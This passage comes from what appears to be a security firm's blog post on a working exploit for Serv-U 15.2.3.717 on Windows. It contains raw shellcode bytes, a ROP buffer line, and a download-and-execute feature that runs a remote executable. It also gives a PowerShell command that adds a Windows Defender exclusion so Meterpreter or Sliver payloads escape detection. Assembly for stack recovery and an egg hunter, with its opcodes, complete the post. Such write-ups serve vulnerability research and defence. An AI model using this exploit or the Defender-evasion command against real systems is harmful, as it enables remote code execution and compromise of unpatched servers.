b"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
b"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
b"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
b"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
b"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
b"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
b"\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff"
b"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
b"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5"
)
rop[offs_NOP_sled+offs_NOP_sled_padding+267:] = shellcode + cmd.encode() + b"\x00"
Again, this saves the user generating new shellcode every time. Finally, I implemented a download + exec feature, which accepts a user-specified URL, downloads an executable from the URL to C:\Windows\Temp
, then runs it. One little wrinkle I added is a PowerShell command to disable Windows Defender virus/malware scans from running in C:\Windows\Temp
so you can run completely unobfuscated Sliver/Meterpreter payloads without getting tripped up by Microsoft endpoint security.
The PowerShell command to do this is:
powershell -Command "& {Add-MpPreference -ExclusionPath c:\windows\temp}"
Without that command you'll find Windows Defender alerts on almost any payload you care to drop. Note: I don't recommend this for red team engagements because you'll still get caught by a zillion other controls. But for simple use cases, it's more than sufficient to pop a connect-back shell or Sliver session.
Sometimes it's necessary to return the stack pointer to whence it came so that the exploited process can resume execution and handle any errors/exceptions tidily. This exploit crashes Serv-U, but it automatically restarts. This is unacceptable in a lot of scenarios and making it not crash is left as an exercise for the reader.
However, returning the stack to normal is an interesting problem because in ROP we don't usually save the stack pointer before pivoting to a different stack - the malicious ROP one. Getting it back generally involves querying the Thread Environment Block ("TEB") and Process Environment Block ("PEB") via the gs
: segment register on 64-bit Intel/AMD Windows. These blocks are maintained by the operating system and provide thread-local storage for metadata about running threads.
The TEB starts at gs:[0]
with a pointer to the PEB at gs:[0x30]
. The PEB contains the stack starting address at offset 0x10
. The following code can be used to read it:
# recover the original stack
mov rax, 0x30
mov rax, qword gs:[rax] # Read address of PEB out of TEB
add rax, 0x10 # Offset in PEB to pre-exploit stack frame address
mov rax, qword ptr [rax] # Dereference [rax] to read the stack frame address out of the PEB
mov rdi, rax # Store address of old stack frame in rdi
In order to return rsp
to the same address it contained at the very beginning of the exploit - at the point when call r9
first occurred - I need to find the precise address of the top of the old stack frame. This turns out to be easy because the stack frame contains return addresses in Serv-U.dll
, which as we saw earlier does not support ASLR.
As a result I can simply look at a stack trace taken at the point call r9
is called and make note of the addresses there. For example, consider this stack trace taken from exactly the scenario just described:
>0:013> k
# Child-SP RetAddr Call Site
00 0000009d`d2aff320 00000000`72111cb8 LIBEAY32!CRYPTO_ctr128_encrypt+0xc6
01 0000009d`d2aff380 00000000`7218f41b LIBEAY32!EVP_rc4_40+0x488
02 0000009d`d2aff3d0 00000000`7210efaa LIBEAY32!FINGERPRINT_premain+0x291b
03 0000009d`d2aff410 00000001`8016086c LIBEAY32!EVP_EncryptUpdate+0xda
04 0000009d`d2aff460 00000001`80141795 Serv_U!CUPnPNotifyEvent::SetTimeout+0x22b7c
05 0000009d`d2aff4a0 00000001`80141263 Serv_U!CUPnPNotifyEvent::SetTimeout+0x3aa5
06 0000009d`d2aff4e0 00000001`80144fb0 Serv_U!CUPnPNotifyEvent::SetTimeout+0x3573
07 0000009d`d2aff580 00000200`577f8dd7 Serv_U!CUPnPNotifyEvent::SetTimeout+0x72c0
08 0000009d`d2aff650 00000200`577f8c5c RhinoNET!CRhinoSocket::ProcessReceiveBuffer+0x33
09 0000009d`d2aff690 00000200`577f6c4e RhinoNET!CRhinoSocket::OnReceive+0x170
0a 0000009d`d2aff6e0 00000200`577f32eb RhinoNET!CRhinoProductSocket::OnReceive+0x3e
0b 0000009d`d2aff710 00000200`577f356b RhinoNET!CAsyncSocketX::DoCallBack+0x107
0c 0000009d`d2aff740 00000200`577f350f RhinoNET!CAsyncSocketX::ProcessAuxQueue+0x53
0d 0000009d`d2aff770 00007fff`5ffda399 RhinoNET!CSocketWndX::OnSocketNotify+0x13
0e 0000009d`d2aff7a0 00007fff`5ffd97af mfc140u!CWnd::OnWndMsg+0xba9 [D:\a01\_work\6\s\src\vctools\VC7Libs\Ship\ATLMFC\Src\MFC\wincore.cpp @ 2698]
0f 0000009d`d2aff920 00007fff`5ffd7093 mfc140u!CWnd::WindowProc+0x3f [D:\a01\_work\6\s\src\vctools\VC7Libs\Ship\ATLMFC\Src\MFC\wincore.cpp @ 2099]
10 0000009d`d2aff960 00007fff`5ffd7464 mfc140u!AfxCallWndProc+0x123 [D:\a01\_work\6\s\src\vctools\VC7Libs\Ship\ATLMFC\Src\MFC\wincore.cpp @ 265]
11 0000009d`d2affa50 00007fff`5fe7a509 mfc140u!AfxWndProc+0x54 [D:\a01\_work\6\s\src\vctools\VC7Libs\Ship\ATLMFC\Src\MFC\wincore.cpp @ 417]
12 0000009d`d2affa90 00007fff`90c60089 mfc140u!AfxWndProcBase+0x49 [D:\a01\_work\6\s\src\vctools\VC7Libs\Ship\ATLMFC\Src\MFC\afxstate.cpp @ 299]
13 0000009d`d2affad0 00007fff`90c5fa02 USER32!UserCallWinProcCheckWow+0x319
14 0000009d`d2affc60 00000001`8016ea75 USER32!DispatchMessageWorker+0x1d2
15 0000009d`d2affce0 00000001`8016eaed Serv_U!CUPnPNotifyEvent::SetTimeout+0x30d85
16 0000009d`d2affd50 00007fff`8ee36b4c Serv_U!CUPnPNotifyEvent::SetTimeout+0x30dfd
17 0000009d`d2affd80 00007fff`90954ed0 ucrtbase!thread_start<unsigned int (__cdecl*)(void *),1>+0x4c
18 0000009d`d2affdb0 00007fff`9124e20b KERNEL32!BaseThreadInitThunk+0x10
19 0000009d`d2affde0 00000000`00000000 ntdll!RtlUserThreadStart+0x2b
The first Serv-U stack frame is at index #4 and contains the saved return address for the instruction at:
Serv_U!CUPnPNotifyEvent::SetTimeout + 0x22b7c: 04 0000009d`d2aff460 00000001`80141795 Serv_U!CUPnPNotifyEvent::SetTimeout+0x22b7c
The return address is 0x180141795
and always will be due to the absence of ASLR. Therefore to find the original stack I just hunt for 0x80141795
(the 4-byte DWORD equivalent of the 5-byte address 0x0180141795
) starting at the address I pulled out of the PEB. I built the following egg hunter:
# Egg hunter for the value 0x80141795 starting at the PEB's stack address.
# No egg-not-found error handling because if this code is running then the
# stack frame we're looking for is guaranteed to exist.
mov eax, 0x80141795 # saved RIP we want to find
mov rcx, 0x4000 # how much memory will we search
cld # clear DF, direction flag
repne scasd eax, dword [rdi] # find the saved stack ptr starting @ [rdi]
mov rax, rdi # save the found stack address in rax
mov rdx, 0x140 # the top of the original stack frame is...
sub rax, rdx # ...0x140 bytes upwards
mov rsp, rax # pivot to the new (old!) stack
You'll notice that some math is being done to subtract 0x140 from rax
before writing it to rsp
. This is to account for the fact that our egg - the saved return address - was not at the top of the stack frame list. In fact, it was index #4 and I need rsp
to point at the frame index #0:
# Child-SP RetAddr Call Site
00 0000009d`d2aff320 00000000`72111cb8 LIBEAY32!CRYPTO_ctr128_encrypt+0xc6
...
04 0000009d`d2aff460 00000001`80141795 Serv_U!CUPnPNotifyEvent::SetTimeout+0x22b7c
The offset on the stack between #4 and #0 is 0x9dd2aff460 - 0x9dd2aff320 = 0x140
so I subtract that amount from rax
before setting the stack pointer, rsp
.
One of the beautiful things about Radare2 is its ability to turn code into opcodes for shellcode. So the above code becomes:
% cat /tmp/s.asm
mov eax, 0x80141795
mov rcx, 0x4000
cld
repne scasd eax, dword [rdi]
mov rax, rdi
mov rdx, 0x140
sub rax, rdx
mov rsp, rax
% cat /tmp/s.asm | rasm2 -a x86 -b 64 -
b89517148048c7c100400000fcf2af4889f848c7c2400100004829d04889c4
Simple and elegant.
Lastly, I could return most of the registers to their pre-exploit values before returning control of execution to the old stack; doing so is left as an exercise for the reader.
This was a fun exploit, and I got lucky a few times! The fact that ASLR was disabled on the Serv-U dll was crazy lucky and saved a lot of hassle.
Other mitigations, such as Control Flow Guard ("CFG"), were also disabled. This again made it easy to write an exploit without having to work around restricted access to critical functions, such as GetProcAddress()
.
It's worth pointing out that the method I use to calculate the address of the ROP stack can, on occasion, generate an address that isn't 64-bit aligned. As a result, when GetProcAddress()
reaches a MOVAPS instruction (which requires memory addresses to be aligned) the exploit crashes. To make the exploit more reliable, the solution is to force the ROP stack to be located at an aligned address; this would require some wrangling and is left as an exercise for the reader.
It should also be pointed out that the exploit is currently hard-coded for Serv-U 15.2.3.717. To build against other Serv-U versions would require a little work to recalculate the ROP gadget addresses in Serv-U.dll. Hopefully, we'd find the same gadgets in the other versions of Serv-U, but I haven't looked yet.
Let us know what you think; you can connect with us on social media and follow us on GitHub for more exploits!
For more information on our continuous offensive security platform, you can get in touch with us via the Cosmos page.
Subscribe to Bishop Fox's Security Blog
Be first to learn about latest tools, advisories, and findings.